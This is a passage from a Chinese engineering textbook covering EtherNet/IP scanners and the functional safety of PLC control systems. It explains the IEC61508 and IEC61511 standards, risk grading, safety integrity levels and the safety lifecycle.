、HMI设备等 。数据传输协议如图3-60所示 。 4) I/O客户机(也称作扫描器)。 扫描器可作为报文的发起者发送显式报文或 I/O报 文 ,一般用于 PLC、I/O扫描器等 。在系统中 ,最常用的是适配器和扫描器 , 因此产品开发 也主要集中在这两种上 。 图 3-60 数据传输协议 (3) EtherNet/IP应用场合 。 EtherNet/IP支持现场和远程监视 、诊断和组态 , 可应用于过程控制 、分布式伺服控制 、安全系统等所有工业场合 , 由于 CIP时间同步符合IEEE1588(用于网络测量和控制系 统的精确时钟同步协议) 标准 , 因此 EtherNet/IP也可应用于需要高精度时间同步 ( ±100 ns) 要 求 的 场 合 。 当 然 , EtherNet/IP产 品 也 可 使 用 标 准 以 太 网 上 的 服 务 , 如 HTTP、 SNMP等 ,这意味着工业自动化和企业信息系统可方便地实现集成 。 EtherNet/IP扫描器被设计成具有通用性的标准部件 ,通过上位机配置工具配置后 , 可 单独作为单层网络系统的主站 ,管理整个 EtherNet/IP网络的适配器 ,也可作为多层网络系 统的数据中转站(见图3-61), 因此 , 它适用于任何符合 EtherNet/IP协议的网络 。 图 3-61 EtherNet/IP系统图 EtherNet/IP扫描器在多层 EtherNet/IP网络中实现了网络间I/O实时数据的交换 , 它 将底层网络上各适配器的 I/O 数据映射到扫描器的 I/O 数据表中 , 使上层 EtherNet/IP Scanner设备只要访问扫描器的I/O数据表就可实现上层设备与底层网络各适配器的数据交 换 。使用 EtherNet/IP扫描器 ,实现了底层网络数据的打包 ,把打包好的数据与上层网络进 行数据交换 , 因此大大减少了上层网络的负荷 ,提高了整个系统的运行效率 , 而且使整个系 统结构清晰 , 易于集成 。 (4) EtherNet/IP应用前景 。 以太网 TCP/IP协议的开放性使其在工控领域通信这一关键环节具有巨大的优势 , 因此 世界著名厂家和集团纷纷支持工业以太网并制订了不同的工业应用标准 ,工业以太网必成为 新一代工业网络的主流 。EtherNet/IP基于完全标准的 TCP/IP以太网 , 这就意味着 Ether- Net/IP产品供应商可以自主地选择全球范围内任何符合工业等级要求的 TCP/IP以太网芯 片进行开发和生产 。这样一来 ,在 EtherNet/IP产品的开发和制造中 , 中国自动控制厂商和 全球范围内其他厂商完全站在了同一条起跑线上 。 同样 , EtherNet/IP工业用户能够直接受 益于标准 TCP/IP以太网技术本身的成本降低和持续发展带来的众多好处 , EtherNet/IP的 性能也会随着以太网其他技术(如高速传输技术 、高速交换技术 、信息安全技术等)的不断发展而提高 。 PLC控制系统安全性 安全 , 按照一般的概念 , 就是没有危险 、不受威胁 , 不出事故 。 如果这样来定义的 话 , 安全是不可控制的 , 因为这是一个绝对安全的概念 , 而绝对的安全是不存在的 。 所 以 , 在功能安全的国际标准IEC61508中 , 给安全做了定义 : 安全是不存在不可以接受的 风险 。 这样 , 安全问题就转化为风险问题 。 如此一来 , 安全就是可以控制的了 , 因为风 险是可控的 。 4.1 PLC控制系统的安全等级 机械的安全性就是机械安全使用说明书规定的预定使用条件下执行其功能 , 和在运输 、 安装 、调整 、拆卸和处理时不产生伤害或危害健康的能力 。 任何一台机械都有风险 ,会导致危险 。这些风险和危险都会导致事故的发生 ,对人员造 成伤害 。分析表明 ,事故的发生主要与人的不安全行为和物的不安全状态两个因素有关 。人 的不安全行为是指人的违章 、违规操作; 而物的不安全状态则是指机械本身的安全失效 ,诸 如安全防护失效 、控制系统中的相关安全部件失效 、机械制造结构不合理等 。我们可以通过 严格的生产规章制度 、安全培训 、采用安全防护用具等手段来减少人的不安全行为 。物的不 安全状态则可以通过合理的设计 、正确的风险评估与分析 、安全自动化控制系统的正确实施 等措施来消除 。 在国内 , 当一起事故发生的时候 ,人们往往关注的是人的不安全行为 ,很少去考虑机械 本身的不安全状态 。一台安全的机械 ,甚至是在发生人的不安全行为的时候 ,也不会导致事 故的发生 。有这样一个真实的事故案例 ,发生在某包装纸有限公司的平压压痕切线机操作线 上 。切线机的压架和压板有如一张硕大的“ 虎口 ” 开开合合 ,不断吐出压制好的包装纸 。在 操作工程中 ,恰好有纸掉入压架合压板之间 。一个操作员工急忙踩住机器脚刹 ,探身把头和 手一起伸入机器里进行调整 。但是该员工穿的是拖鞋 , 导致脚下打滑 , 松开了制动的脚刹, 致使压架上翻 ,头部和右手同时被切线机压住 。该员工最终丧命“ 虎口”。 当对这个事故进 行分析的时候 ,人们往往关注的是操作人员违章操作的不安全行为 。如果采用了正确的 、合 理的安全控制系统(如安全栅栏或者安全光电保护装置和安全控制装置), 这起事故就不会 发生 。 当人们能够关注机械本身的安全性能的时候 ,其安全功能应该由安全自动化控制系统来 实现 。安全控制系统的正确设计会影响到机械的安全性能 。 以日常生活中最常见的电梯为 例 ,这台机械就会导致轿厢门或层门夹人的危险 。 当乘客被门夹住 , 而电梯启动运行的话,危险事故将会发生 。为了保护人员安全 ,必须控制并降低风险 。 因而 , 电梯生产商通常采用 了光电开关或门限位开关感应乘客所处的位置 ,并通过机械式门开关判断门是否关闭 。如乘 客被夹或者站立在轿厢和楼层之间 ,并且导致门无法关闭 ,光电开关或限位开关信号以及机 械式门开关会将信号传至控制系统 ,控制系统则暂停电梯当前的运行状态 。通过这些安全功 能的实现 ,从表面看来风险被降低了 ,危险被消除了 。但是 ,风险是否被降得足够低是人们 需要考虑得问题 。 因为很多时候人们都会忽略整个控制系统中的风险 ,这些风险包括诸如触 点粘连 、 电缆短路等 。这些故障是由开关信号 、控制模块或触发装置失效导致的功能失效, 从而导致危险的出现 。所以 ,安全控制系统的可靠性是衡量这台机械是否符合安全要求的重 要依据 。 4.1.1 系统功能安全国际标准 功能安全标准的出台经历了一个久远的历史过程 , 它是历史发展的必然 ,也是人类技术 发展与成熟的标志 。工业文明在给人类带来利益的同时 ,也带来了灾难 。全世界每年死于工 伤事故和职业病危害的人数约为20万人 ,是人类最严重的死因之一 。为了实现“ 安全工业” 理想 ,越来越多的安全相关系统(包括自动控制系统和自动保护系统) 用在不同领域 ,保护 人员免受伤害 ,保证机械 、整套装置甚至整个工厂自动正常 、安全地运转 。但安全相关系统 的产业 化 应 用 , 遇 到 子 系 统 功 能 安 全 难 以 确 定 这 个 最 大 的 阻 力 。 例 如 直 到 1997 年, IEC60204还要求不要将电子技术用于机械安全相关系统 。用户对电子技术和计算机系统的 可靠性和安全性没有信心 ,就是因为没有一个公认的功能安全技术标准 ,没有保证电气 、 电 子 、计算机 、现场总线技术构成的安全相关系统的功能安全的配套技术 。 1974年英国 Flixborough爆炸事故 、 1976年意大利化工厂二 英泄漏事故 、 1984年印 度 Bhopal农药厂毒气泄漏事故和1986年切尔诺贝利核电站事故等 ,接连发生的工业事故起 因都是安全相关系统的功能失效 。人们开始认识到 ,必须采取措施 ,用标准和法规来规范领 域内安全相关系统的使用 ,使技术在安全的框架内发展 ,使人类既能尽可能的享受新技术带 来的安全与舒适 , 同时又能掌控危险 ,不让技术缺陷和人为错误导致灾难的发生 ,功能安全 标准研究从此展开 。 20世纪70年代中期以前 ,安全相关系统大多由电磁继电器组成 ,也有部分采用固态集成 电路构成 。80年代开始采用冗余的标准型 PLC。 随着对设备安全 、人身安全和环境保护的要 求越来越严格 ,各工业企业和仪表自动化行业对过程安全功能 , 即有关安全相关系统的功能 安全给予了极大的关注 。 于是 , 80年代中期以后 ,伴随着微电子技术和控制系统可靠性技 术的发展 ,专门用于有关安全相关系统的控制器系统 、安全型 PLC和安全解决方案(Safety Solution) 得到迅速发展和推广 。另外 ,PLC生产厂也推出了安全型的 PLC, 在产品设计中 引入了表决和诊断功能 。 世界上各知名的 DCS生产厂 , 如 FoxBoro、 ABB、 Honeywell, 为了提高自己的竞争能力 , 保持在工业控制领域中的份额 , 通过购买安全产品的专业生 产厂家或者同专业生产厂结成联盟 , 把 DCS同安全型控制器紧密的综合在一起 , 实现了 无缝连接 。 但安全控制系统或设备执行安全功能时的可靠性问题 , 限制了用户使用新技术的积极 性 。 由于没有公认的评价体系 ,制造商就很难说服用户使用新技术 ,尤其在关系人身财产安 全的重要领域使用新技术 。另外 ,不同行业对安全要求的不同 ,也限制了安全设备的产业化 生产规模 。制造商迫切需要一个公认的标准来建立一个与用户对接的公共平台 。 各国安全法规体系和责任体系都不尽相同 , 国际电工委员会IEC制定的功能安全标准, 主要是根据欧美的法律和安全文化环境制定的 。在这些国家里 ,没有相应标准的新技术很难 用于安全领域 , 因为存在着法律责任的问题 。功能安全标准规定了与安全控制相关的法律责任体系 。 4.1.1.1 功能安全标准体系现状 目前功能安全标准已经成为领域 内的热点 。 IEC61508发布后 , 欧美 等国家纷纷采用 , 以 IEC61508为基 础 ,不同应用领域及子系统/产品部 件的功能安全标准陆续出台 , 已经形 成的功能安全标准体系 , 如 图 4-1 所示 。 4.1.1.2 功能安全标准主要内容 (1) IEC61508的主要内容 。 图 4-1 功能安全标准体系结构图 2000年5月 , 国际电工委员会正式发布了IEC61508标准 , 名为 《电气/电子/可编程 电子安全系统的功能安全》, 与之对应的我国国家标准正在制定中 。该标准分七部分 , 涉及 1000多个规范 。 由电气和电子部件构成的系统 , 多年来在许多工控领域中执行安全功能; 以计算机为基 础的系统在许多工控领域中用于非安全目的 ,但也越来越多地用于安全目的 。 当前计算机 、 集成电路等技术的发展已经渗透到所有工业领域 ,计算能力的极大增强彻底改变了工厂和工 业过程的控制 ,也改变了安全控制策略 。对于包含有电子 、 电气设备 ,计算机软 、硬件的系 统 ,要用于关系到人身财产安全的领域中时 ,进行规范的安全指导是十分必要的 。 IEC61508针对由电气/电子/可编程电子部件构成的 、起安全作用的电气/电子/可编程 电子系统(E/E/PE) 的整体安全生命周期 ,建立了一个基础的评价方法 。 目的是要针对以 电子为基础的安全系统提出一个一致的 、合理的技术方案 , 统筹考虑单独系统 (如传感器 、 通信系统 、控制装置 、执行器等) 中元件与安全系统组合的问题 。IEC61508的内容分为以 下七个部分 。 第1部分: 一般要求 。描述了标准适用范围 、安全生命周期 、危险和风险分析 、整体安 全要求 、安全要求分配 、计划编制(包括操作维护 、安全确认 、安装和试运行计划), 实现 E/E/PES(包括建立其他技术安全系统和外部风险降低措施) 以及功能安全评估 。 第2部分: 对电气/电子/可编程电子安全系统的要求 。 主要给出了在 E/E/PES安全生 命周期中各个阶段任务 ,如根据规定的安全要求的分配对安全系统提出安全功能和安全完整 性要求 , 编制安全确认计划 ,具体实施设计与开发 、集成 、操作与维护 、安全确认 、修改 、 验证及功能安全评价等阶段的要求 。 附录给出了用于 E/E/PES的技术和措施以及诊断覆盖 率和安全失效 、分数的计算方法 。 第3部分: 对软件的要求 。描述 E/E/PES的软件安全生命周期中安全完整性水平所要 求的软件获取 、开发 、集成 、确认 、修改 、验证和评估内容 , 同时在附录中给出了在不同阶 段采用的软件技术和测量选择指南 。 第4部分: 定义和缩略语 。 第5部分: 一些确定安全完整性水平的方法示例 。 附录给出了风险与安全完整性之间的 关系 ,根据任何风险必须降低到可行的合理水平一样低(即 ALARP) 原理 , 确定允许风险 目标(频率和后果), 给出了一些定性和定量确定安全完整性水平方法 。 第6部分: 第2和第3部分的应用指南 。 附录给出了IEC61508 2和IEC61508 3应 用中的功能安全操作步骤; 硬件失效概率评估技术示例; 系统在低要求操作模式下和高要求 操作模式下各种表决组工作的诊断覆盖率及安全失效分数计算示例; 量化 E/E/PES中硬件 共同原因失效效应的方法; 软件安全完整性的应用示例 。 第7部分:测试方法 ,简短的注释并提供部分参考书目包括IEC61508 2和IEC61508 3中 有关的各种安全技术和测量方法概述 。 附录 A是 E/E/PES的技术和测量概述: 硬件随机失 效控制 。 附录 B是 E/E/PES的技术和测量概述 ——— 系统失效的避免 。 附录 C是达到软件完 整性的技术和测量方法的评述 。 附录 D是确定预测开发软件的软件安全完整性的一种概 率法 。 (2) IEC61511的主要内容 。 IEC61511《Functional safety——— Safety instrumented systems for the process industry sector》, 过程工业部门仪表型安全系统的功能安全就是根据IEC61508在具体应用领域 ——— 过程工业仪表型安全系统制定的 。 IEC61511标准共分 3个部分 , 它针对由仪器仪表构成 的 、起安全作用的整体安全生命周期 , 3部分的主要内容具体如下 。 第1部分: 框架 、定义 、系统 、硬件和软件要求 。描述了对系统结构 、硬件配置 、应用 软件和系统集成的要求 。包括了功能安全管理 、安全生命周期要求 、验证 (verification)、 过程风险分析 、分配安全功能到保护层等 。这部分还包括了 SIS(安全仪表系统) 的整体安 全要求 、SIS设计一工程和应用软件要求 。其中还包含了详细的软件安全生命周期 。这部分 还描述了工厂接受测试(Factory Acceptance Test)、 SIS安装和投运 、SIS操作和维护和拆 卸 。 附录 A中描述了IEC61511与IEC61508之间的关系 。 第2部分: IEC61511的应用指南 。这部分提供和IEC61511的应用指南和信息 。 附录 A概括了条款5, 6, 7,并制定了应用的具体步骤 。 附录 B提供了一个计算 PFD(要求时的 失效概率) 的示例 。 附录 C介绍了一个化工企业 SIS系统结构开发的示例 。 附录 D介绍了3 个应用IEC61511的示例 。 附录 E介绍了一个 PLC生产厂商开发符合标准的 PLC的方法 。 附录 F概括了标准相关的技术和方法 。 第3部分: 确定要求的安全完整性等级的指南 。这部分提供了通过风险分析确定安全完 整性水平的指南 。 附录 A描述了 ALARP(AsLow As Reasonably Practicable) 准则 。 附录 B~F介绍了几种定量或定性的确定安全完整性的方法 。包括安全矩阵法(定性)、 校正风险 图法(半定性)、 风险图法(定性)、 保护层分析(半定量) 等 。 (3) IEC61508与IEC61511的区别与联系 。 IEC61508是一般性标准 ,可以作为开发其他具体部门标准的基础 , 在没有相应部门标 准的领域中 ,也可以直接应用该标准 。IEC61511是流程工业部门的国际标准 , 针对流程工 业的一些特点 ,对IEC61508作了相应的改进 。 比如在IEC61511中 ,规定的最高的设备安 全完整性水平为 SIL3,低于IEC61508中的 SIL4,就是考虑了流程工业很少需要安全完整 性水平达到 SIL4的安全设备 ,从而增强了标准在流程业中的实用性 。 流程工业的推荐安全 标准如图4-2所示 。 图 4-2 IEC61511和IEC61508针对不同软硬件设计的关系 4.1.2 系统功能安全重要概念 4.1.2.1 IEC61508中的重要概念 (1) 功能安全 。 针对规定的危险事件 , 为达到或保持受控设备 (EUC) 的安全状态 , 由 E/E/PE安全 系统 、其他技术安全系统或外部风险降低设施实现的功能 。 (2) 功能安全保证的内容 。 功能安全保证主要包括两部分内容: 失效识别和安全完整性水平 。 1) 失效识别 。失效就是功能单元失去实现其功能的能力 。 一些功能是根据所达到的行 为进行规定的 ,在执行功能时 ,某些特定的行为是不允许的 ,这些行为的出现就是失效 。失 效可能是随机失效 ,这种失效通常由于硬件装置的耗损所致 。也可能是系统失效 ,这在硬件 和软件中都可能出现 。失效识别就是要分辨出不同部件的各种失效原因 ,估算出系统失效 概率 。 2) 安全完整性水平(SIL)。 一种离散的水平 ,用于规定分配给 E/E/PE安全系统的安 全功能的安全完整性要求 ,安全系统的安全完整性水平越高 ,安全系统实现所要求的安全功 能失败的可能性就越低 。IEC61508中规定系统有4种安全完整性水平 ,SIL4是最高的 ,安 全完整性水平1是最低的 。 (3) 安全完整性(SI)。 在规定的条件下 、规定的时间内 ,安全系统成功实现所要求的安全功能的概率 。这一定 义着重于安全系统执行安全功能的可靠性 。在确定安全完整性过程中 ,应包括所有导致非安 全状态的因素 ,如随机的硬件失效 , 软件导致的失效以及由电气干扰引起的失效 ,这些失效 的类型 ,尤其是硬件失效可用测量方法来定量 ,如在危险模式中的失效和系统失效率 , 或按 规定操作的安全防护系统失效的概率 。但是 , 系统的安全完整性还取决于许多因素 ,这些因素无法精确定量 ,仅可定性考虑 。 (4) E/E/PE系统 。 基于电气/电子和可编程电子装置的用于控制 、 防护或监视的系统 , 包括系统中所有的 元素如电源 、传感器 、所有其他输入输出装置及所有通信手段 。 (5) EUC。 受控设备 ,指用于制造 、运输 、 医疗或其他领域的设备 、机器 、装置或装备 。 (6) 可接受风险 。 风险指的是出现伤害的概率及该伤害严重性的组合 。可接受风险指根据当今社会的水准 所能够接受的风险 。 (7) 安全 。 不存在不可接受的风险 。 (8) 安全相关系统 。 安全相关系统是用于两个目的: ①执行要求的安全功能以达到或保持 EUC的安全状 态; ②自身或与其他 E/E/PES安全系统 、其他技术安全系统或外部风险降低设施一道 , 对 于要求的安全功能达到必要的安全完整性 。 安全系统是在接受命令后采取适当的动作以防止 EUC进入危险状态 。安全系统的失效 应被包括在导致确定的危险事件中 。尽管可能有其他系统具备安全功能 ,但仅是指用其自身 能力达到要求的允许风险的安全系统 。安全系统可大致分为安全控制系统和安全防护系统 。 安全系统可以是 EUC控制系统的组成部分 ,也可用传感器和/或执行器与 EUC的接口 , 既 可用在 EUC控制系统中执行安全功能的方式达到要求的安全完整性水平 , 也可用分离的/ 独立的专门用于安全的系统执行安全功能 。 4.1.2.2 IEC61511中的重要概念 (1) 安全仪表系统 。 在过程工业领域如石化 、化工等 , 是用安全仪表系统来表述安全相关系统 , 即 SIS (Safty Instrumented System) 用来实现一个或几个仪表安全功能的仪表系统 , 可以由传感 器 、逻辑解算器和终端元件的任何组合组成 。 (2) 仪表安全功能 。 具有某个特定安全完整性水平(SIL) 的 ,用以达到仪表功能安全的安全功能 。 它既可 以是安全保护系统安全功能 ,也可以是安全控制系统安全功能 。 4.2 电气与电子及可编程系统的功能安全 4.2.1 系统风险评估与管理 4.2.1.1 系统风险评估 IEC61508中对风险的定义为 “ 出现伤害的概率及该伤害严重性的组合”, 即风险是 一个危险事件 (或事故) 概率 (或频率) 及该事件后果 (或严重程度) 的函数 。 风险评 估包括对危险分析中识别出的危险事件的风险进行分级 。 以发生频率和后果的严重程度 为标准划分了 1、2、3、4四个风险等级 。 意外事件的风险等级见表 4-1。 风险等级解释 见表 4-2。 表 4-1 意外事件的风险等级 频率 后 果 大灾难 严重 不严重 可忽略 频繁发生 1 1 1 2 很可能发生 1 1 2 2 偶尔发生 1 2 3 3 极小可能发生 2 3 3 4 不可能发生 3 3 4 4 难以相信会发生 4 4 4 4 注 风险等级 1、 2、 3、 4的实际数与领域有关 , 根据实际频率是频繁还是可能等确定 。 因此 , 应将本表看作是一个 说明如何填写此类表的示例 , 而不是对未来应用的规范 。 表 4-2 风 险 等 级 解 释 风险等级 解 释 风险等级 解 释 等级 1 不允许风险 等级 3 如果风险降低的成本超过取得的改善 时允许的风险 等级 2 不期望风险 , 当风险降低不可行或者 成本与取得的改善严重不相称时为允许 等级 4 可忽略的风险 4.2.1.2 系统风险降低 IEC61508中定义的安全为不存在不可接受的风险 。 安全是相对的 , 风险是不可能完全 消除的 。 对于可能导致严重后果的危险事件的风险 , 必须降低到可接受的水平 。 要降低风 险 , 就是要在工艺过程中采取各种防护措施 , 将风险降低到安全程度 , 如图 4-3所示 。 其 中 , 风险是危险事件发生的概率和其所造成的后果的组合 。 在IEC61508中主要定义了如下 几种风险指标 : 图 4-3 风险管理 .过程风险: 被在没有任何风险降低措施的情况下 ,整个工艺过程所产生的风险; .允许风险: 在以现行社会标准为基础的给定情景下可被接受的风险; .残余风险: 在采取了所有风险降低措施之后 ,仍然保留的风险; .必要的风险降低: 通过所有风险降低措施必须实现的风险降低 , 以确保残余风险不超 过允许风险 。 .实际的风险降低: 通过所有风险降低措施所实际实现的风险降低 。 风险降低措施可以分为3类 。 即由 E/E/PE安全相关系统负担的风险降低部分 , 由外部 风险降低设备负担的风险降低部分以及由其他技术相关系统负担的风险降低部分 。 IEC61511进一步提出了保护层的概念 。保护层被定义为通过控制 、 防护或者减灾等手 段降低风险的独立装置或措施 ,如图4-4所示 。 图 4-4 风险降低的通用概念 保护层既可以是具体的设备装置 , 比如说安全系统 、安防设备 ; 也可以是某种措施 , 比如说疏散的流程规定 , 或者是操作规定 , 这些都可以视为保护层 。 保护层的作用可以 是防止风险的发生 , 或者是减轻风险的后果 。 但是保护层的定义中 , 有两点是必须的: 其一是风险降低 , 一个保护层的目的就是完成风险降低 ; 其二是独立 , 任何保护层必须 是独立地降低风险 。 因而 , 可以这样理解 , 一个保护层就是一套独立的风险降低的措施 或者装置 。 如图4-5所示 , 流程车间中的典型风险降低方法 , 也就是保护层通常根据作用范围分 为6层 ,从最内层的工艺层向外分别是监控层 、风险防止层 、风险后果减轻层 、工厂应急反 应层 、社会应急反应层 。工艺层保护层首先在整个工艺过程的原理上降低工艺过程中的风 险 。监控层保护层则是在工艺过程正常运行中通过控制系统或者管理员人为操作等手段降低 风险 。风险防止层保护层则是在危险条件出现时干涉工艺过程 ,避免风险的发生 。风险后果 减轻层保护层在风险发生不可避免时用于减轻风险的后果 。工厂应急反应层和社会应急反应 层主要是对于灾难性的风险所设置的应急预案 。 安全系统作用于风险防止层防护层与风险后果减轻层中 , 在工艺过程发生事故的情况 下 ,可减少风险发生的概率和风险所造成的后果 ,从而降低工艺过程的风险 。 图 4-5 流程车间中的典型风险降低方法 4.2.2 系统安全完整性等级 4.2.2.1 安全完整性等级标准 根据IEC61508的定义 ,安全完整性是在规定的条件下和规定的时间内 ,安全相关系统 成功实现所要求的安全功能的概率 。为了具体量化安全完整性 , IEC61508定义了安全完整 性等级(Safety Integrity Level, SIL) 的概念 ,用于规定分配给 E/E/PE。 安全相关系统的安全功能的安全完整性要求 , 最高为 4, 最低为 1。 SIL级别越高 , 安 全相关系统能实现所要求的安全功能的概率就越高 。但是 ,达到某个 SIL等级并不意味着系 统就是绝对安全或可靠 。满足某个 SIL等级的要求 ,仅仅是提供了一种安全的可信度 ,具体 而言 ,就是一个系统或功能失效的概率低于该 SIL等级规定的失效概率 。 因此 , SIL不是降 低风险的措施 , 而是风险降低的目标 。 IEC61508将安全相关系统按照操作模式的不同分为低要求操作模式 、高要求操作模式 或连续操作模式 ,并针对不同操作模式下的安全完整性等级规定了相应的目标失效概率 。见 表4-3和表4-4。在低要求操作模式下 , 对一个安全相关系统提出操作要求的频率不大于 每年一次和不大于两倍的检验测试频率 ,否则均应看作高要求操作模式或连续操作模式的安 全相关系统 。 安全完整性等级的确定基于风险评估的结果 ,不恰当的风险评估技术会导致安全相关系 统的安全完整性等级过高或过低 。安全完整性等级过高会造成浪费 ,过低将不能满足安全要 求而导致发生不可接受风险 。 表 4-3 低要求模式下安全相关系统的 安全功能目标失效概率 安全完整性等级 低要求操作模式(在要求时就执行其 设计功能要求的平均失效概率) 4 ≥10—5且<10—4(低于 10000年一遇) 3 ≥10—4且<10—3(低于 1000年一遇) 2 ≥10—3且<10—2(低于 100年一遇) 1 ≥10—2且<10—1(低于 10年一遇) 表 4-4 高要求或连续操作模式下安全相关 系统的安全功能目标失效概率 安全完整性等级 高要求或连续操作模式 (每小时危险失效概率) 4 ≥10—9且<10—8 3 ≥10—8且<10—7 2 ≥10—7且<10—6 1 ≥10—6且<10—5 4.2.2.2 安全完整性等级要求的结构 等级1要求使用成熟的元器件, 即在相似的应用领域中有过广泛和成功的使用 ,或是根 据可靠的安全标准或者成熟的技术制造的元器件 。安全完整性等级1的结构如图4-6所示 。 等级 2除了要符合等级 1的要求 外 ,还必须要做到在机器的控制系统 中能够对安全控制系统进行测试, 在 机器启动时和在危险状态出现前, 对 安全功能进行测试 。安全完整性等级 2 的结构如图4-7所示 。 图 4-6 安全完整性等级 1的结构 图 4-7 安全完整性等级 2的结构 等级3在等级1的基础上要求当安全控制系统中的一个元件出现故障时, 不会导致安全 功能的实效 ,一些但不是所有的故障都可以被检测出来 ,一个累积的故障会导致安全功能的 失效 。安全完整性等级3的结构如图4-8所示 。 等级4为最高安全控制等级 。在等级1的基础上 ,等级4要求及时安全控制系统中的 一 个元器件故障也不会引起安全功能失效, 并且故障可以在下一次安全功能起作用格式被识别 图 4-8 安全完整性等级 3的结构 出来 。如果无法识别 ,要求多个故障的累积不会引起安全功能的失效 。安全完整性等级 4的 结构如图4-9所示 。 图 4-9 安全完整性等级 4的结构 4.2.3 系统功能安全的评估 功能安全评估的目的是调查并判断 E/E/PE安全相关系统所达到的功能安全 。对 SIS的 功能安全评估从两个方面来进行: ①评估为了确保满足功能安全目的所必需的管理活动是否 有效; ②评估安全仪表系统或安全仪表是否达到了要求的 SIL, 如何确认设计和生产的安全 仪表和 SIS的 SIL达到要求 。 (1) 建立功能安全管理体系 。 建立功能安全管理系统目的是确定整体的 、E/E/PES的和软件的安全生命周期所有阶 段的管理和技术活动 ,这些阶段是达到 E/E/PE安全相关系统要求的功能安全所必需的; 确 定人员 、部门和组织对整体的 、E/E/PES的和软件的安全生命周期各阶段或各阶段中活动 所负的责任 ,通过体系来保障能达到要求的安全完整性 。 (2) 建立与功能安全相关的文件 。 文件应规定能够有效执行整体安全生命周期 、E/E/PES安全生命周期和软件安全生命 周期各阶段所必需的信息; 规定能够有效执行功能安全管理 、验证以及功能安全评估等活动 所必需的信息 , 以及有关的报告和记录 。 功能安全评估时 , 为了满足IEC61508时文档的要求 ,在整体安全生命周期的各阶段的 各个活动都要给出相关的文档 。 功能安全评估时需要的文档示例可参考 IEC61508 1附 录 A。 4.2.3.1 软硬件安全完整等级评估 (1) 硬件故障裕度的要求 。 硬件故障裕度指部件或子系统在出现一个或几个硬件故障的情况下 ,功能单元继续执行 所要求的仪表安全功能的能力 。硬件故障裕度 N 意味着 N+1个故障会导致全功能的丧失 。 例如: 硬件故障裕度为1,表示如有两台设备 , 它们的结构应使得两个部件之一的危险失效 不得阻止安全动作发生 。为了减轻仪表安全功能设计中的潜在缺陷 , IEC61511 1表 5和 表6定义了传感器 、逻辑解算器和终端元件最低的硬件故障裕度 。对仪表安全功能而言 , 传 感器 、逻辑解算器和最终元件应具有最低的硬件故障裕度 ,硬件故障裕度表示了最低的部件 或子系统冗余 。 (2) 硬件安全完整性的结构约束 。 硬件安全功能所声明的最高安全完整性等级受限于硬件故障裕度及执行该安全功能的子 系统的安全失效分数(SFF)。 IEC6150 2表2和表 3为 A类和 B类相关子系统的结构约 束 ,表示在 SFF确定的情况下 ,SIL与最低硬件故障裕度之间的关系 。 在进行安全完整性等级 (SIL) 评估时 , 首先要根据部件或子系统的失效模式是否已 知 、数据是否可索 、故障行为是否确定来区别硬件的结构约束是属于 A类还是 B类 。 然后 ,进行 SFF及 PFD 计算 , 对应 IEC61508 1表 2或表 3, 可以得到相对应的 SIL。 即部件和相关子系统的安全完整性等级 。 在确定子系统最大硬件安全完整性等级时 , 必须考虑系统结构约束 , 即在 SFF确定前 提下 ,故障裕度要求与 SIL的对应关系 。B类相关子系统的结构约束见表 4-5(IEC61508 表2)。 表 4-5 B类相关子系统的结构约束 安全失效分数(SFF) 硬件故障裕度 0 1 2 <60% 不允许 SIL1 SIL2 60%~<90% SIL1 SIL2 SIL3 90%~<99% SIL2 SIL3 SIL4 ≥99% SIL3 SIL4 SIL4 4.2.3.2 现场总线系统安全功能评价方法 要证明一个系统或子系统是否可以用在安全领域 ,是否符合IEC61508标准 ,有两个途 径: ①按照IEC61508的原则设计一个新系统; ②沿用以前已经使用并证明是安全的系统, 用 Proven in use方法来验证 。现场总线系统的功能安全评价一般都采取第二种方法 。 这是 一个在“ 使用中证实 ” 的概念 。如果一种产品或系统已经在使用中 , 只要供应商有足够的证 据证明它是安全的 ,那么以后相同的产品或系统就允许应用在同等安全的领域 。 IEC61508中提出的这种 Proven in use的概念对于供应商和用户都有极大的激励作用 。 目前世界上一些重要设备的供应商都开始对自己的产品进行这方面认证工作 。但 Proven in use实际上有很严格的限制条件: . Proven in use方法只能用于那些满足相关要求的功能和接口子系统; .子系统的工作条件与原子系统的工作条件完全相同或十分相近; .如果子系统的工作条件不同 ,则需要用分析和测试的方法来论证该系统的功能安全完 整性可能达到的水平 , 以保证该系统可用于安全领域; .声明的失效率有足够的统计学数据基础; .收集有足够的失效数据; .考虑子系统的复杂性 ,子系统对风险降低的贡献 ,子系统失效对整个系统可能造成的 后果 ,新设计等 。 4.3 过程工业控制安全仪表系统的功能安全 4.3.1 安全生命周期 根据IEC61508的定义 ,安全生命周期是安全相关系统实现过程中所必需的生命活动, 这些活动发生在从一项工程的概念阶段开始 ,直至所有的 E/E/PE安全相关系统 、其他技术 安全相关系统 , 以及外部风险降低设施停止使用为止的一段时间内 。安全生命周期构建了功 能安全管理的框架 ,其基本思想是功能安全相关的所有活动都是按一个有计划的系统的方法 进行管理的 。 系统的安全不仅是由系统的设计和实现决定的 ,还取决于系统的安装 、运行和 维护等活动 ,包括了为达到必需的安全完整性水平而进行的一切活动 。换句话说 ,安全生命 周期包括了安全仪表系统在概念 、设计 、运行 、测试 、维修及停用各阶段的所有活动 , 以达 到高水平的功能安全 。达到功能安全不是一劳永逸的 , 而是一个持之以恒 、无微不至的过 程 。 图4-10为IEC61508标准中对完整安全生命周期的描述 。 可见 , 完整安全生命周期的 每个阶段都有各自的范围 、 目的及所要求的输入和符合要求的输出 ,通过这种结构化的分析 方法指导过程风险分析 、安全相关系统的设计和评估 。 图 4-10 完整安全生命周期 4.3.2 联锁系统安全等级 IEC61511作为过程工业安全联锁系统的安全评定标准 ,对 SIS在整个生命周期内的安 全保障及安全管理提出了许多良好的工程经验 ,在联锁系统生命周期的各个阶段都发挥了很好的指导作用 。其中围绕联锁系统的生命周期开展的各项工作如图4-11所示 。 图 4-11 IEC61511围绕联锁系统的生命周期开展的各项工作 IEC61511标准列出了大量经过实践证明的有助于安全的好的工程经验, 种种好的工程 经验涵盖了包括联锁系统设计 、安装 、运行及维护 、改进等方方面面 。典型的被认为是有助 于联锁系统安全的工程经验有: 1) 对于过程工业而言 , 在单个联锁回路中一般不推荐使用安全等级为 SIL4的联锁回 路 。这是由于安全等级要达到SIL4级非常困难, 并且单个安全等级为SIL4的联锁回路的维 护十分困难 。 2) 一般情况下用于联锁回路的设备不应再用于基本过程控制系统 (BPCS), 以避免由 于公用设备的故障造成基本过程控制系统与联锁回路同时无法正常工作导致的危险, 除非这 种使用经审核后认为风险是可接受的 ,否则不推荐采用这种方法 。 3) 对于安全等级较高的场合, 如 SIL3或 SIL4推荐使用多个联锁回路来实现联锁回路 的安全等级 